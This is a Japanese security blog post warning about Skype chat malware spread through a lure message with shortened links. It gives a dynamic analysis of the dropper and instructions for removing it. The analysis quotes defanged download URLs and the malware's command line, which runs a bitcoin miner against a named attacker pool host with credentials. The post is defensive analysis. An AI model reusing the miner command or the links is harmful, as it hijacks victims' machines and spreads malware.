「あなたはこの絵でクレイジーに見える(笑)URL」 新種のスカイプ経由のウイルスについて

【スポンサーリンク】

皆様、こんばんは。3月最後の週、いかがお過ごしでしょうか?

それでは今回の投稿にまいりましょう。

【スポンサーリンク】

はじめに

さて今回の投稿ですが、リクエストに対する投稿となります。

この記事をご閲覧されている皆様は、昨年の10月に流行したスカイプのチャット機能を悪用したウイルスを覚えていらっしゃいますか?

(1)緊急! スカイプをお使いの皆様へ" href="https://www.japan-secure.com/entry/blog-entry-26.html" target="_blank" rel="noopener noreferrer">(2)緊急! スカイプをお使いの皆様へ

このマルウェアです。実はこのマルウェアは10月以後も、スカイプ上でしぶとく生き残っておりました。

そして本日、ある方より問い合わせがあったのですが、どうやらここ最近で新種のウイルスが発生しているようです。

調べてみましたが、拡散方法は以前と同じようですね。

【スポンサーリンク】

スカイプウイルスに関する概要

「あなたはこの絵でクレイジーに見える(笑)URL」

上記のメッセージに書かれているURLにアクセスしますと、実行ファイルをダウンロードすることが出来ます。そして左記を実行すると感染するというわけです。

以下のURLをご覧ください。

ttp://goo.gl/NXquh?img=スカイプID

ttp://goo.gl/zK6mk?img=スカイプID

上記のURLは昨年の10月と同様に短縮URLで偽装しています。左記を元に戻しますと以下のようになります。

skyevirus

skyevirus1

アップローダにアクセスしています。

つまりURLにアクセスしただけでは感染しません。またファイルをダウンロードしただけでも同様に感染はありません。しかし実行するとアウトです。

それでは実際にダウンロード出来るファイルについて説明します。

まず今回ダウンロードしたファイル名です。

foto__03.24.2013.exe

virustotal

解析サービス結果

上記の結果からもわかりますが、いまだ半数程度のセキュリティベンダーしか対応していません。

そしてこのマルウェアは、頻繁にプログラムの改変を行うので、セキュリティソフトを用いての検出は難しいです。

さてそれでは上記のfoto__03.24.2013.exeを実際に実行してみます。

skyevirus2

まずfoto__03.24.2013.exeを実行しますと、攻撃者のサーバと通信を行い、上記のランダム英字.exeがユーザフォルダ下に作成されます。

skyevirus4

そしてさらに攻撃者サーバーとの通信でランダム英字.exeがユーザフォルダ下に作成されます。

skyevirus5

そしてさらに攻撃者サーバーとの通信でランダム英字.exeがユーザフォルダ下のtempに作成されます。

実際にfoto__03.24.2013.exeを実行後の通信状況です。

skyevirus3

そして上記の作成されたファイルは最終的に、2番目・3番目のランダム英字ファイルがユーザフォルダ下のroaming とtempに作成されています。

特にtempに作成されたランダム英字ファイルは、自身を同じ場所にコピーし、攻撃者サーバーとの通信を常時行っているようでした。

skyevirus6

上記画像のとおり、一つのマルウェアプロセスが異様にCPUを占有していますね。左記のマルウェアの通信先は以下のようです。


bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u bigbob0000001@gmail.com -p password


そして上記の異様にCPUを占有するファイルは、PCの起動毎に生成されるようになっているようでした。

以上のように今回のマルウェアは、以前のマルウェアよりも複雑になっていますね。おそらく通信のやり取りにはPC内のIPアドレス等の情報を送信しているのでしょう。

皆様にはどうかご注意をお願いしたいと思います。

スカイプウイルスに関する削除方法

それでは最後に削除方法を載せておきたいと思います。といいましても安全を考慮しますと、リカバリした方が賢明です。

どちらを選択するかは皆様におまかせします。

1、【隠しファイルの表示設定】

まずはお使いのPCを隠しファイルを表示するの設定にします。

隠しファイルやシステムファイルを表示させる方法

2、【ツールのダウンロード】

次に以下の駆除ツールをダウンロードしてください。

ATF-Cleaner (直リンク)

Malwarebytes Anti-Malware

3、【ツールによるスキャン】

ダウンロードが完了しましたら、PCを再起動してセーフモードで起動します。

セーフモードの起動方法は、BIOSの起動画面後(メーカーのロゴが表示される事が多い)から、Windowsロゴが表示される前のタイミングでF8キーを押します。

次に詳細ブートオプション画面でセーフモードを選択しEnterキーを押します。

セーフモードで起動しましたら、デスクトップ画面のスタート→プログラムとファイルの検索に以下を入力します。

%appdata%

上記のように入力してenterを押してください。

検索結果に表示されたroamingという項目をクリックします。そうしますとフォルダ画面が表示されますので、以下の画像のような該当のランダム英字のファイルを右クリックしてして削除を選択します。

skyevirus8

該当のファイルの検索には更新日時等を確認し、間違えのないようにしてください。

次に先にダウンロードしたATF-cleanerを実行します。select allにチェックを入れて、empty selectedをクリックします。しばらく待ってdoneと表示されたら完了です。

skyvirus9

これで上記画像のtempに作成されたファイルの削除が完了です。

そしていよいよ最後の作業です。(この作業はレジストリを編集します。レジストリは削除する値を間違えますとOSに致命的なダメージを与えますので慎重に行ってください。自信がない方は無理をせず、リカバリを行ってください)

まずデスクトップ画面よりスタート→プログラムとファイルの検索に以下を入力してenterを押してください。

regedit

検索結果をクリックしてレジストリエディタを起動します。そしてレジストリエディタの起動画面より、以下のように階層をたどってください。

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

上記のようにです。くれぐれもお間違いのないように。そしてrunまでたどりつきましたら、以下のような値を探して右クリックし削除します。

skyvirus10

削除する値は2つあります。

ランダム英字

WINSXS32

間違えのないように探してください。いずれの値もデータの項目が、

C:\Users\ユーザー名\AppData\

↑ このようになっているはずです。気をつけて削除してください。

削除が終わりましたら、レジストリエディタの画面を閉じてPCを再起動して通常起動してください。

あとはmalwarebyteでPC全体をフルスキャンしていきます。

Malwarebytes Anti-Malwareの使い方について(改訂版)

これで全作業終了です。何度も書きますが自信がない方はリカバリなさってください。

なお駆除後の対策ですが、、

Skypeを起動し、ツール→設定→詳細→詳細設定→アクセスとクリックし、管理で見覚えのないプログラムがあれば削除して連携を解除してください。

あとがき

さて今回の投稿は以上となります。

今回の投稿で記載する記事以外のマルウェアの対策方法に関連する記事に興味がある方は、ぜひ一度以下のマルウェアの対策方法に関連する記事のまとめを参照してください。


<マルウェアの対策方法に関連する記事のまとめ>

1、URL

マルウェアの対策方法に関連する記事のまとめ


それでは以上です。

脚注)「▲戻る」をクリックすると本文に戻ります   [ + ]